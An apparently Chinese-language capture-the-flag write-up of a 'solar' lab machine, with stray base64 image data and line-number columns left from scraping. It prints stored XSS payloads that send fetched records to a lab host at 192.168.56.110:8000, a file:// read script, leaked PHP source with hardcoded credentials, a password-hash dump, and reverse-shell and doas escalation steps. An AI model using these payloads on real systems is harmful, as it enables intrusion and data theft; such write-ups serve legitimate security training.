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"}
1
2
3
"<img src=x onerror=\"(async () => { location.href='http://192.168.56.110:8000/?data='+btoa(String.fromCharCode(...new Uint8Array(await (await fetch('/records/')).arrayBuffer())));})(); \" />"
"<img src=x onerror=\"(async () => {location.href='http://192.168.56.110:8000?data='+btoa(String.fromCharCode(...new Uint8Array(await (await fetch('/records/?download=true&file=2024-09-02T23%3A29%3A26.645Z.json')).arrayBuffer())));})();\" />"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<!DOCTYPE html>
<html>
<head>
<title>List of Solar Energy Data</title>
<link rel="stylesheet" href="/style.css">
<link rel="stylesheet" href="/style3.css">
</head>
<body>
<div style="min-width:400px;background:white;padding:15px;border-radius: 8px;box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);">
<div style="text-align:center;"><object class="solar-icon" data="../sun.svg" type="image/svg+xml" style="width:75px;"></object></div>
<h1>List of Solar Energy Data</h1>
<table>
<tr>
<th>Record</th>
<th>Actions</th>
</tr>
<tr>
<td>2024-09-02T23:15:11.396Z</td>
<td>
<a href="?download=true&file=2024-09-02T23%3A15%3A11.396Z.json" class="download-btn">Download PDF</a>
</td>
</tr>
<tr>
<td>2024-09-02T23:18:15.742Z</td>
<td>
<a href="?download=true&file=2024-09-02T23%3A18%3A15.742Z.json" class="download-btn">Download PDF</a>
</td>
</tr>
<tr>
<td>2024-09-02T23:18:44.091Z</td>
<td>
<a href="?download=true&file=2024-09-02T23%3A18%3A44.091Z.json" class="download-btn">Download PDF</a>
</td>
</tr>
<tr>
<td>2024-09-02T23:24:33.828Z</td>
<td>
<a href="?download=true&file=2024-09-02T23%3A24%3A33.828Z.json" class="download-btn">Download PDF</a>
</td>
</tr>
<tr>
<td>2024-09-02T23:24:44.800Z</td>
<td>
<a href="?download=true&file=2024-09-02T23%3A24%3A44.800Z.json" class="download-btn">Download PDF</a>
</td>
</tr>
<tr>
<td>2024-09-02T23:25:15.961Z</td>
<td>
<a href="?download=true&file=2024-09-02T23%3A25%3A15.961Z.json" class="download-btn">Download PDF</a>
</td>
</tr>
<tr>
<td>2024-09-02T23:29:14.124Z</td>
<td>
<a href="?download=true&file=2024-09-02T23%3A29%3A14.124Z.json" class="download-btn">Download PDF</a>
</td>
</tr>
<tr>
<td>2025-02-21T21:34:50.691Z</td>
<td>
<a href="?download=true&file=2025-02-21T21%3A34%3A50.691Z.json" class="download-btn">Download PDF</a>
</td>
</tr>
<tr>
<td>2025-02-21T21:44:15.783Z</td>
<td>
<a href="?download=true&file=2025-02-21T21%3A44%3A15.783Z.json" class="download-btn">Download PDF</a>
</td>
</tr>
</table>
<a href="../dashboard.php" class="logout-link">< Back</a>
</div>
</body>
</html>
1
"\"><script>\np='/var/www/solar.nyx/records/index.php';\nx=new XMLHttpRequest;\nx.onerror=function();\nx.onload=function();\nx.open(\"GET\",\"file://\"+p);x.send();\n</script><x=\""
1
<a href="?download=true&file=2025-02-21T21%3A56%3A21.634Z.json" class="download-btn">Download PDF</a>
到这你就已经完成了前面xss的准备工作现在只需要进行Lfi读取文件了,这里可以看到我们拿回来的index,现在我直接跳过一个一个Lfi查找文件直接查找sunfriends.nyx/server.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
{
"time": "2025-02-21T21:34:50.574Z",
"user": {
"name": "JulianAdm",
"role": "admin"
},
"solar": 235,
"consumed": 132,
"grid": -103,
"chart": "\"><script>\np='/var/www/sunfriends.nyx/server.php';\nx=new XMLHttpRequest;\nx.onerror=function();\nx.onload=function();\nx.open(\"GET\",\"file://\"+p);x.send();\n</script><x=\""
}
"<img src=x onerror=\"document.querySelector(`#send-record-id`).dispatchEvent(new Event('click'));\" />"
"<img src=x onerror=\"(async () => { location.href='http://192.168.56.110:8000/?data='+btoa(String.fromCharCode(...new Uint8Array(await (await fetch('/records/')).arrayBuffer())));})(); \" />"
"<img src=x onerror=\"(async () => {location.href='http://192.168.56.110:8000?data='+btoa(String.fromCharCode(...new Uint8Array(await (await fetch('/records/?download=true&file=2024-09-02T23%3A29%3A26.645Z.json')).arrayBuffer())));})();\" />"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
<?php
$secure = true;
$httponly = true;
$samesite = 'Strict';
$secret = [
'user' => '5up3r',
'pass' => 'bloods'
];
if (PHP_VERSION_ID < 70300) {
session_set_cookie_params($maxlifetime, '/; samesite=' . $samesite, $_SERVER['HTTP_HOST'], $secure, $httponly);
} else {
session_set_cookie_params([
'lifetime' => $maxlifetime,
'path' => '/',
'domain' => $_SERVER['HTTP_HOST'],
'secure' => $secure,
'httponly' => $httponly,
'samesite' => $samesite
]);
}
session_start();
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['username']) && isset($_POST['password'])) {
$username = $_POST['username'];
$password = $_POST['password'];
// Verify credentials
if ($username === $secret['user'] && $password === $secret['pass']) {
$_SESSION['loggedin'] = true;
header('Location: server.php');
exit;
} else {
$error = "Incorrect username or password.";
}
}
if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {
// Handle logout
if (isset($_POST['logout'])) {
session_destroy();
header('Location: server.php');
exit;
}
// Handle command execution
if (isset($_POST['execute']) && isset($_POST['command_file'])) {
$commandFile = 'commands/' . basename($_POST['command_file']);
if (file_exists($commandFile)) {
$commandJson = file_get_contents($commandFile);
$command = json_decode($commandJson, true);
if (isset($command['cmd'])) {
$output = shell_exec(escapeshellcmd($command['cmd']));
$mqttHost = 'localhost';
$mqttTopic = 'server/command/output';
$mqttMessage = json_encode([
'name' => $command['name'],
'command' => $command['cmd'],
'output' => base64_encode($output)
]);
$mqttCommand = sprintf(
'mosquitto_pub -h %s -t %s -m %s -u '.$secret['user'].' -P \''.$secret['pass'].'\'',
escapeshellarg($mqttHost),
escapeshellarg($mqttTopic),
escapeshellarg($mqttMessage)
);
shell_exec($mqttCommand);
} else {
$output = "Invalid command format in the file.";
}
} else {
$output = "Command file not found.";
}
}
// Get list of command files
$commandFiles = array_diff(scandir('commands'), ['.', '..', 'php-info.php']);
// Show admin panel if user is authenticated
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Admin Panel</title>
<link rel="stylesheet" href="/style.css">
<link rel="stylesheet" href="/styleadmin2.css">
</head>
<body>
<main>
<h1>Server Administration Panel</h1>
<p>This is a server administration or management page.</p>
<p style="text-align:left;">Server contains two websites:
<ul>
<li style="text-align:left;"><strong>sunfriends.nyx</strong> a forum about solar energy.</li>
<li style="text-align:left;"><strong>solar.nyx</strong> a real time control panel for the community solar
installation.</li>
</ul>
</p>
<form method="post" action="">
<input type="submit" name="logout" value="Logout">
</form>
<h2>Server Information</h2>
<form method="post" action="">
<label for="command_file">Select Command:</label>
<select name="command_file" id="command_file" required>
<?php foreach ($commandFiles as $file): ?>
<option value="<?php echo htmlspecialchars($file); ?>"><?php echo htmlspecialchars($file); ?></option>
<?php endforeach; ?>
</select>
<br><br>
<input type="submit" name="execute" value="Execute">
</form>
<?php if (isset($output)): ?>
<h3>Command Output:</h3>
<pre><?php echo htmlspecialchars($output); ?></pre>
<?php endif; ?>
</main>
</body>
</html>
<?php
} else {
// Show login form if user is not authenticated
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Admin Login - Solar Community Server</title>
<link rel="stylesheet" href="/style.css">
<link rel="stylesheet" href="/styleadmin.css">
</head>
<body>
<!-- Main container for the login form -->
<div class="login-container">
<!-- Page header -->
<h2>Admin Login</h2>
<!-- Subheader to clarify the purpose of the login -->
<h3>Administration Server for <strong>solar.nyx</strong> and <strong>sunfriends.nyx</strong></h3>
<!-- Display error message if present -->
<?php if (isset($error)): ?>
<p class="error"><?php echo $error; ?></p>
<?php endif; ?>
<!-- Login form -->
<form method="post" action="">
<!-- Username input -->
<label for="username">Username</label>
<input type="text" name="username" id="username" required>
<!-- Password input -->
<label for="password">Password</label>
<input type="password" name="password" id="password" required>
<!-- Submit button -->
<input type="submit" value="Login">
</form>
<!-- Footer link to the main site -->
<div class="footer-link">
<p>Not an admin? <a href="/">Return to Solar Community Forum</a></p>
</div>
</div>
</body>
</html>
<?php
}
?>
有用户和密码,需要进行操作和添加新的消息回显
可以看到真的在进行命令注入
没有nc wegt busybox,只有curl,具体的操作就只有curl一个命令执行了
没弹回来应该是写错命令的问题重新来了
总算弹回来了是-o的问题
提权
啥也没有,三个选择了,找密码,定时任务,或者某个内置信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
www-data@solar:/home/julian$ ls -al
total 436
drwxr-xr-x 9 julian julian 4096 Sep 4 21:36 .
drwxr-xr-x 4 root root 4096 Aug 28 19:01 ..
lrwxrwxrwx 1 root root 9 Aug 28 19:04 .bash_history -> /dev/null
-rw-rw---- 1 julian julian 220 Apr 23 2023 .bash_logout
-rw-rw---- 1 julian julian 3526 Apr 23 2023 .bashrc
drwxrwx--x 4 julian julian 4096 Aug 28 19:27 .cache
drwxrwx--x 3 julian julian 4096 Aug 28 19:16 .config
drwxrwx--x 3 julian julian 4096 Sep 4 11:35 .gnupg
-rw------- 1 julian julian 20 Sep 4 11:05 .lesshst
drwxrwx--x 4 julian julian 4096 Sep 1 18:34 .local
lrwxrwxrwx 1 root root 9 Aug 28 19:05 .mysql_history -> /dev/null
-rw-rw---- 1 julian julian 16 Aug 29 19:45 .node_repl_history
drwxrwx--x 3 julian julian 4096 Aug 28 19:16 .npm
drwxrwx--x 5 julian julian 4096 Aug 28 19:15 .nvm
drwxrwx--x 3 julian julian 4096 Aug 28 19:16 .pki
-rw-rw---- 1 julian julian 904 Sep 4 18:11 .profile
-rw------- 1 julian julian 386348 Sep 4 12:22 my-pass.jpg
www-data@solar:/home/julian$ ls -al /home/
julian/ lenam/
www-data@solar:/home/julian$ ls -al /home/lenam/
total 52
drwxr-xr-x 6 lenam lenam 4096 Sep 4 05:55 .
drwxr-xr-x 4 root root 4096 Aug 28 19:01 ..
lrwxrwxrwx 1 root root 9 Jun 10 2024 .bash_history -> /dev/null
-rw-rw---- 1 lenam lenam 220 Jun 10 2024 .bash_logout
-rw-rw---- 1 lenam lenam 3578 Aug 28 20:08 .bashrc
drwxrwx--x 4 lenam lenam 4096 Sep 4 04:47 .gnupg
lrwxrwxrwx 1 lenam lenam 9 Aug 29 19:44 .lesshst -> /dev/null
drwxrwx--x 3 lenam lenam 4096 Jul 13 2024 .local
lrwxrwxrwx 1 root root 9 Jun 28 2024 .mysql_history -> /dev/null
-rw-rw---- 1 lenam lenam 48 Aug 28 01:06 .nanorc
-rw-rw---- 1 lenam lenam 9 Sep 4 05:55 .node_repl_history
drwxrwx--x 4 lenam lenam 4096 Aug 29 19:27 .password-store
-rw-rw---- 1 lenam lenam 807 Jun 10 2024 .profile
drwxrwx--x 2 lenam lenam 4096 Aug 27 19:35 .ssh
-rw-rw---- 1 root lenam 80 Sep 4 04:12 note.txt
-rw-rw---- 1 root lenam 33 Jul 13 2024 user.txt
好像是藏东西了
服啦,没有一个对我来说能看的
这密码不知道有没有用
想多了,唯一线索是数据库了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
-- MariaDB dump 10.19 Distrib 10.11.6-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost Database: solar_energy_db
-- ------------------------------------------------------
-- Server version 10.11.6-MariaDB-0+deb12u1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Table structure for table `users`
--
DROP TABLE IF EXISTS `users`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `users` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(50) NOT NULL,
`password` varchar(64) NOT NULL,
`role` varchar(20) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `users`
--
LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
INSERT INTO `users` VALUES
(1,'Robert24','66dc8ac996672de0cdeb294808d4cca21ba0bc856c365e90562565853febed0c','user'),
(2,'calvin','e8e9689deac5bac977b64e85c1105bd1419608f1223bdafb8e5fbdf6cf939879','user'),
(3,'JulianAdm','bbca1b30190fddeead4e1a845ee063bec94499601aa5ee795da8917767bdcdde','admin'),
(4,'John20','38858f3066c9a6f3d8c6e54fbfcff204d5383f0721c32bc8ae46cf46a93e3694','user');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2024-08-24 21:17:08
跑密码无果,用工具了目前来说我已经手动找不了任何信息了
还有信息没看,可以看一下
有想搁置的冲动了,好难啊,光看进程我就已经找不到下一步的路了,没看懂问一下gtp了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
从日志内容来看,这是一系列与 Puppeteer 和 Chrome 相关的命令行记录,显示了在 Linux 系统上运行的 Chrome 浏览器进程及其相关参数。以下是对这些日志内容的简要分析:
1. Puppeteer 和 Chrome 的使用场景
Puppeteer 是一个 Node.js 库,用于通过 DevTools 协议控制 Chrome 或 Chromium 浏览器。它常用于自动化测试、爬虫、生成网页截图等任务。
日志中提到的 --headless=new 表明 Chrome 是以无头模式(Headless Mode)运行的,这意味着浏览器在没有图形界面的情况下运行,适合服务器环境或自动化任务。
--remote-debugging-port=47000 表示启用了远程调试功能,允许 Puppeteer 通过 WebSocket 连接到 Chrome 并控制它。
2. Chrome 的启动参数
--disable-dev-shm-usage:禁用 /dev/shm,通常用于解决 Linux 系统中共享内存不足的问题。
--noerrdialogs:禁用错误对话框,避免在自动化过程中弹出干扰。
--mute-audio:静音音频输出。
--ignore-certificate-errors:忽略 SSL 证书错误,这在测试环境中很常见。
--user-data-dir=/tmp/puppeteer_dev_chrome_profile-gd924T:指定 Chrome 的用户数据目录,用于存储临时配置和缓存。
3. 进程类型
--type=renderer:表示渲染进程,负责渲染网页内容。
--type=gpu-process:表示 GPU 进程,用于处理图形渲染任务。
--type=utility:表示辅助进程,例如网络服务或存储服务。
--type=broker 和 --type=zygote:这些是 Chrome 的内部进程,用于进程间通信和管理。
4. 安全和调试相关参数
--enable-crash-reporter 和 --crashpad-handler-pid:与崩溃报告相关的参数,用于收集和报告崩溃信息。
--change-stack-guard-on-fork=enable:启用堆栈保护机制,增强安全性。
--disable-breakpad:禁用 Breakpad,一个轻量级的崩溃报告工具。
5. 其他关键信息
操作系统:从 annotation=lsb-release=Debian GNU/Linux 12 (bookworm) 可知,系统为 Debian 12。
Chrome 版本:ver=126.0.6478.126 表示 Chrome 的版本为 126.0.6478.126。
Node.js 版本:/home/julian/.nvm/versions/node/v22.7.0/bin/node 表示使用了 Node.js 22.7.0 版本。
6. 可能的问题或用途
这些日志可能是在运行一个基于 Puppeteer 的自动化脚本(如 login.js)时生成的。
如果出现错误或异常,这些日志可以帮助调试问题,例如检查 Chrome 的启动参数是否正确,或者是否存在资源限制(如 /dev/shm 的使用)。
解决不了继续看wp了,这里需要利用doas,这个我没见过,我还是太菜了不过信息都找到了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
www-data@solar:/home/lenam$ doas -u lenam /usr/bin/mosquitto_pub --help
mosquitto_pub is a simple mqtt client that will publish a message on a single topic and exit.
